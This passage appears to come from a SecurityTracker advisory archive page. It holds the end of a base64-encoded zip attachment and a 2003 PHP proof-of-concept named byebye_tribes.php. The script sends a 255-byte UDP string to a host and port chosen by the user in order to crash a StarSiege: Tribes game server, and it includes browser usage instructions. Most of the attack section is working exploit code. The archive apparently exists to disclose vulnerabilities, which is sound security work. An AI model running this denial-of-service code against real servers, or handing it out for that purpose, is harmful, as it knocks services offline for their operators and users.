uMo7WS0ClG00LI+PioXwnq3oYn8LG+kiiEZHUw1FOT9hO1oJrWpQAg6FBJbCAU2GMuYL3YEWwu4y
QSGv8biGB/3gqSPnWXkCnEwhPlHpUs1VDEhay+qEJIml3GC3Bmu9Cy5xdmsNeTJLDayLVCzuDRdg
sHFhIn2kTlNfzFeRcxt4LBWCfERw26bfMIm/xuRn6XJ0h6hoLHvHWqw2PiHnv9TS+U0nE2tIfmRl
Q3VJ16Ph1Qy6MxgNJ5uihqsx/FnQ03YOCbczo6vQnwRaWO5NZD+ydI92Vec+ebAf+q/SIrkgWhKB
BRrqr6EGsMFeJxBUhJkz1JBoGngpwbB75H8GD1lA/pXoOWs83ts7gJMfD0lFKieUCwOaQdaDkr0U
MoZIYaLYmGErp7tW0rJXlDAuEFVrgIKFs10LrZA2G1o7TZyDpgRDqItKRKFk34e319cZ9/u1UaEC
DSMvrBLzqhkGQG4ZyyaVUZTlpeJ+n2aHZBtv9qMmbznIAxd3t4wwQwQ7lVzwLAWe6iXPH4ud5exZ
2NJmysTuLV6SEXlAsa4klIfZFMYm+K3ZaUblHnFxj4oyyiKxRocujuE4qOI8BpSMBbTEiBb3pPhi
k4uqD6XkV412JRK6BswYPdAJ9c9aDclKaLTvBEseLwgm4hkHQRvAANxyhh1iqORxJT1X7245Zwkp
Kxs2Q+AOUc3coWMxpfoMiUuIBZ+2Hc1a/UlEjfoddBfFE5Q4qfZWCK1oPCvEbuf3ME9QnDQKOpjN
JtPP/dnskH78kZobPiignXopJ/Ccx4zKBUR3nsbhgwhKlAqT5/N9zw2VS13XK/zMBfpoyH2TVegw
/6pQ/yTmJrENvH3CZLtSbiV8XsbvhNAVQsRF4jlGLVSN42JQoZ5AnBQ0BYlMrpw390eMaXsHpPD7
j0ZBh4Jtsai3FbNBtVWbSI6X8rYZ6iKue8/k6ONmsnupMqebly8UZO8sjX/fTVccEfEAU+4MU+y4
N77j54jsK39lxDqLn2YKkQWuIcMLdAHPhbi2xhvGfftTMwvTc0gKMrwAkXUe05HI57zL+Nb5gj/g
yg+h9MWDUUXKsYis45GOWyqWh47RHpdOapGPU3rVfnUyrFttL60+4N9AKc8SFSNZj/DoIXvGXIwk
lre4w4a/zFIWrB2s3jrpsGU4b/yfNsVG+Sd8RCPZ26P0L654xjM6YsthZWQ032K4YR9f9yL253dd
4TP3tk58z6c/41gav9k79Dr2B2m9dWEIi/MiZyOOfWX40sXk46tXkj9LganG2P8tri3j/LhF+hWS
xQp9j11v8ee7WY3ovgvQLnu3vHn9u/KP7Y/JrZ3tFylv/S9QSwECFgsUAAAACAASWO4uaOQVVksI
AACdEQAADwAAAAAAAAABACAAgIEAAAAAYnllYnllX3RyaWJlcy5jUEsBAhYLFAAAAAgAxoysLNRr
XhXlHAAAAFkAAAgAAAAAAAAAAQAgAICBeAgAAGdldG9wdC5jUEsBAhYLFAAAAAgAxoysLPsGVsd0
BwAAnRIAAAgAAAAAAAAAAQAgAICBgyUAAGdldG9wdC5oUEsFBgAAAAADAAMAqQAAAB0tAAAAAA==

------=_NextPart_000_002F_01C349F7.4BDC89C0
Content-Type: application/octet-stream;
	name="byebye_tribes.phps"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment;
	filename="byebye_tribes.phps"

<?php
/* 
Author: st0ic <st0ic@fsix.net>
Website: http://www.fsix.net/
Name: byebye_tribes.php
Original Date: 07/14/2003
Purpose: POC "StarSiege: Tribes" DoS

Usage: Call it from a browser once its uploaded on a server
with PHP installed:

http://host/byebye_tribes.php?host=127.0.0.1&port=28001

Note - global variables must be enabled in php.ini (yes... I 
know thats bad too)

Stuff:
Yeah... too lazy to fine tune it, maybe someone else can
throw in HTML forms to give it a little interface ;-).
*/

$fp = fsockopen("udp://$host", $port, $errno, $errstr, 30);
if (!$fp) 
{
	echo "$errstr ($errno)<br>\n";
	exit;
}
else
{
	$char = "a";
	for($a = 0; $a < 255; $a++)
		$data = $data.$char;

	if(fputs ($fp, $data) )
		echo "successful<br>";
	else
		echo "error<br>";
}
?>
------=_NextPart_000_002F_01C349F7.4BDC89C0--


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC